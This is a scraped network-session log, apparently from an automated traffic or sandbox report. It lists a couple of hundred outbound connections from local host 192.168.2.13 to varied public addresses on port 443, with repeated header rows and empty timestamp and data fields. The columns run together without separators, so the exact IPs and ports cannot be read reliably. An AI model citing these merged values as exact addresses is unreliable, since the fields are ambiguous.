                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13943192.168.2.1359404201.144.28.73443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13944192.168.2.1340398176.9.210.225443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13945192.168.2.1340224189.108.72.62443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13946192.168.2.13404042.197.35.103443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13947192.168.2.135529642.143.72.191443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13948192.168.2.134225684.193.62.41443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13949192.168.2.13588324.37.226.209443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13950192.168.2.1352766102.232.33.125443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13951192.168.2.135889823.113.42.5443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13952192.168.2.1354626180.174.79.128443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13953192.168.2.1350778119.118.63.50443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13954192.168.2.1359446113.18.103.69443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13955192.168.2.1339642176.228.70.105443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13956192.168.2.134955091.242.231.40443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13957192.168.2.1344938211.109.140.36443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13958192.168.2.1349626217.139.244.203443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13959192.168.2.1348214103.6.103.248443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13960192.168.2.1342418174.57.154.9443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13961192.168.2.1344422135.14.123.161443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13962192.168.2.1344034134.92.70.206443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13963192.168.2.1350668137.166.208.194443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13964192.168.2.1343682179.101.113.98443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13965192.168.2.134547646.106.108.104443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13966192.168.2.1349236118.124.4.160443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13967192.168.2.1334584129.86.132.255443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13968192.168.2.1358768107.208.54.187443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13969192.168.2.1347624196.158.108.174443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13970192.168.2.1335690122.81.155.172443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13971192.168.2.1349524132.195.117.223443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13972192.168.2.1355860191.215.118.175443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13973192.168.2.1335456113.234.251.191443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13974192.168.2.1333926141.248.133.157443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13975192.168.2.1341842112.54.66.19443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13976192.168.2.134933278.74.72.191443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13977192.168.2.1333010117.67.229.41443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13978192.168.2.1344688125.231.13.177443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13979192.168.2.1334868222.56.193.157443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13980192.168.2.1339022178.55.26.38443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13981192.168.2.1337180145.72.185.27443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13982192.168.2.1352830129.177.226.218443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13983192.168.2.1357174193.61.89.246443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13984192.168.2.1349222106.74.83.129443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13985192.168.2.1333714183.223.142.235443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13986192.168.2.1349472198.34.128.169443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13987192.168.2.1334766165.236.145.22443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13988192.168.2.1337762110.91.161.224443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13989192.168.2.1346324164.107.143.13443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13990192.168.2.13555565.152.131.81443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13991192.168.2.135094858.0.206.132443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13992192.168.2.1357358137.23.21.111443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13993192.168.2.1348590197.142.226.144443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13994192.168.2.133388293.184.145.188443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13995192.168.2.133742087.246.182.133443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13996192.168.2.135726097.244.165.53443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13997192.168.2.134502474.250.34.48443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13998192.168.2.135528451.202.153.145443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13999192.168.2.134587814.122.167.108443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14000192.168.2.1349300116.208.140.241443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14001192.168.2.1359596165.99.173.197443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14002192.168.2.1336876123.75.38.197443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14003192.168.2.134692819.3.64.145443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14004192.168.2.1334968145.34.223.124443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14005192.168.2.1349826134.3.78.176443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14006192.168.2.135879463.218.82.209443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14007192.168.2.1360850141.57.142.133443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14008192.168.2.134090853.29.160.220443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14009192.168.2.1337912211.14.196.101443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14010192.168.2.135314699.67.49.107443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14011192.168.2.1343528132.120.70.124443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14012192.168.2.1355586163.60.12.5443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14013192.168.2.1343452119.84.246.3443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14014192.168.2.1335632194.166.75.146443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14015192.168.2.134296270.182.199.152443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14016192.168.2.134331465.204.32.185443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14017192.168.2.135485275.101.223.215443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14018192.168.2.1342314146.143.181.45443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14019192.168.2.1346854200.117.106.170443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14020192.168.2.1347082103.209.42.194443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14021192.168.2.1336154135.234.202.237443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14022192.168.2.1356178142.143.153.155443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14023192.168.2.1357346114.88.175.165443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14024192.168.2.1360766101.11.168.43443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14025192.168.2.133377664.53.105.179443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14026192.168.2.1349516118.223.234.236443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14027192.168.2.1359208201.203.99.155443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14028192.168.2.134953047.182.17.54443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14029192.168.2.135993886.143.209.132443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14030192.168.2.1360190207.85.77.253443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14031192.168.2.135695662.190.49.119443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14032192.168.2.1342622109.167.110.136443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14033192.168.2.1345334153.214.128.80443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14034192.168.2.13346182.14.175.51443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14035192.168.2.1337136148.122.75.213443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14036192.168.2.1346296183.39.219.54443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14037192.168.2.135612867.161.41.113443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14038192.168.2.134181672.5.144.219443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14039192.168.2.1356250132.113.23.223443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14040192.168.2.134027048.147.248.31443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14041192.168.2.135164641.92.172.187443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14042192.168.2.13496809.140.221.172443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14043192.168.2.135278035.153.134.190443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14044192.168.2.1339774100.196.163.61443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14045192.168.2.1357778191.249.17.140443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14046192.168.2.1342612151.224.244.39443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14047192.168.2.133648824.76.230.131443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14048192.168.2.135542663.236.93.187443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14049192.168.2.135644812.82.18.70443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14050192.168.2.1347118117.170.26.67443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14051192.168.2.133278840.177.135.74443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14052192.168.2.1340950145.157.172.95443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14053192.168.2.135200860.85.132.62443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14054192.168.2.1342694188.148.211.234443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14055192.168.2.135785620.136.165.82443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14056192.168.2.134080291.153.140.11443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14057192.168.2.133627263.222.139.43443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14058192.168.2.134740438.8.17.84443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14059192.168.2.133748644.218.57.145443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14060192.168.2.1346428155.197.230.160443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14061192.168.2.134654467.160.9.220443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14062192.168.2.1356264139.153.222.245443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14063192.168.2.13371345.222.251.171443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14064192.168.2.135805475.67.146.133443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14065192.168.2.134758070.203.195.249443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14066192.168.2.1341366119.139.127.102443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14067192.168.2.135018453.55.127.141443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14068192.168.2.1352758184.91.106.27443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14069192.168.2.1347138222.60.145.113443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14070192.168.2.1345684178.229.103.151443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14071192.168.2.1332864194.140.140.114443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14072192.168.2.1335338177.93.33.135443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14073192.168.2.133712054.38.218.73443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14074192.168.2.134740863.127.39.6443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14075192.168.2.135725067.196.124.245443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14076192.168.2.1360698158.236.94.38443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14077192.168.2.136097879.245.107.11443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14078192.168.2.1355880202.225.71.83443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14079192.168.2.1351012125.252.121.44443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14080192.168.2.134977057.119.237.219443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14081192.168.2.1356360200.29.231.37443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14082192.168.2.1345398125.126.2.84443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14083192.168.2.1340850195.232.200.7443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14084192.168.2.1338014153.131.53.153443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14085192.168.2.1345276191.151.22.33443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14086192.168.2.1339614110.37.207.78443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14087192.168.2.135510223.124.181.213443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14088192.168.2.1358346165.185.53.117443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14089192.168.2.1357508158.207.63.100443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14090192.168.2.1337640188.221.127.153443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14091192.168.2.1341482187.70.101.216443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14092192.168.2.1350972212.240.145.137443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14093192.168.2.1336926168.203.201.153443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14094192.168.2.134748695.200.225.167443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14095192.168.2.1334502111.254.189.207443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14096192.168.2.134507885.49.92.0443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14097192.168.2.135866423.138.86.253443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14098192.168.2.1343560187.8.231.163443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14099192.168.2.1350280199.184.21.174443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14100192.168.2.1343412171.92.69.245443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14101192.168.2.1340190131.244.119.158443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14102192.168.2.135049242.101.184.206443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14103192.168.2.13546941.162.129.236443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14104192.168.2.135608098.46.135.109443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14105192.168.2.1347088173.206.243.221443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14106192.168.2.1351858107.77.199.53443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14107192.168.2.1342720210.60.54.85443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14108192.168.2.134620272.226.247.7443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14109192.168.2.1349462198.170.78.109443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14110192.168.2.1349852184.119.37.56443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14111192.168.2.1360406188.164.210.106443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14112192.168.2.134808086.209.252.118443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14113192.168.2.1345284124.38.59.58443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14114192.168.2.1344130148.130.15.202443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14115192.168.2.1341444177.128.231.112443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14116192.168.2.1333002134.147.16.106443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14117192.168.2.1350192143.222.26.215443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14118192.168.2.1351216207.135.252.236443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14119192.168.2.1335304223.131.79.52443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14120192.168.2.134837217.132.201.121443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14121192.168.2.134946698.139.201.248443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14122192.168.2.1351148108.203.83.206443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14123192.168.2.1342496163.81.100.168443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14124192.168.2.135767219.116.71.44443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14125192.168.2.1355390170.23.32.208443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14126192.168.2.1358586217.255.105.230443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14127192.168.2.134852088.174.146.62443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14128192.168.2.135203871.155.193.170443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14129192.168.2.135233635.86.2.10443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14130192.168.2.1358852182.154.11.20443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14131192.168.2.135003692.159.190.83443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14132192.168.2.136033823.100.204.164443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14133192.168.2.133501281.112.8.239443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14134192.168.2.135519470.56.195.2443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14135192.168.2.1335404108.246.183.111443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14136192.168.2.1340178138.85.27.43443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14137192.168.2.1353522179.149.251.127443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14138192.168.2.133377682.4.200.192443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14139192.168.2.1346602223.141.80.180443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14140192.168.2.135739069.154.217.13443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14141192.168.2.135621038.95.155.4443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14142192.168.2.135332099.99.252.79443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14143192.168.2.1337318189.159.62.156443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14144192.168.2.1336812141.221.71.162443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14145192.168.2.1345502178.96.139.54443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14146192.168.2.1343730178.157.222.198443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14147192.168.2.133364099.10.184.243443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14148192.168.2.1343382209.224.33.146443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14149192.168.2.134023859.82.78.72443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14150192.168.2.1358752179.84.67.84443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14151192.168.2.1352626147.77.81.27443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14152192.168.2.1351320114.44.98.22443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14153192.168.2.134603085.16.103.11443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14154192.168.2.135322258.0.214.215443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14155192.168.2.1350628221.39.185.82443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14156192.168.2.1349728141.198.141.92443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14157192.168.2.1339318201.147.28.156443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14158192.168.2.134129036.251.177.210443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14159192.168.2.134390053.120.147.171443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14160192.168.2.1356816203.135.43.193443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14161192.168.2.135593474.206.96.107443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14162192.168.2.1348590223.181.166.155443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14163192.168.2.1346792213.51.172.191443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
